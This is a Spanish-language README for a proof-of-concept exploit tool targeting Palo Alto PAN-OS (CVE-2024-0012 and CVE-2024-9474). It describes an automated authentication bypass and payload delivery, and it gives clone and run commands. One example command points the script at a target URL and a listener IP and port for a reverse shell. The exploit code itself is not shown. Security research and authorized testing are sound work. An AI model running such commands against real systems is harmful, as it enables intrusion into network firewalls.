
Este PoC está dirigido a vulnerabilidades en Palo Alto PAN-OS, específicamente CVE-2024-0012 y CVE-2024-9474. Este script automatiza el proceso de explotación, incluyendo la creación de payloads, la entrega fragmentada y la ejecución fluida de comandos.
Este script de Prueba de Concepto (PoC) se dirige a vulnerabilidades en Palo Alto PAN-OS, específicamente CVE-2024-0012 y CVE-2024-9474, automatizando el proceso de explotación, incluyendo el bypass de autenticación, la creación del payload, la entrega fragmentada y la ejecución de comandos sin interrupciones.
⚠️ Este script es solo para fines educativos y pruebas de penetración autorizadas. El uso no autorizado es ilegal.
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: La URL de destino, incluyendo http o https.<LISTENER_IP>: Tu dirección IP para el listener del reverse shell.<LISTENER_PORT>: El puerto para el listener del reverse shell.python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5
¡Obtén el desglose completo y los detalles técnicos de este PoC en este artículo de Medium!
Este PoC está destinado únicamente a fines educativos y pruebas de seguridad autorizadas. El uso no autorizado de esta herramienta está estrictamente prohibido. Los autores no son responsables de cualquier mal uso o daño causado por esta herramienta.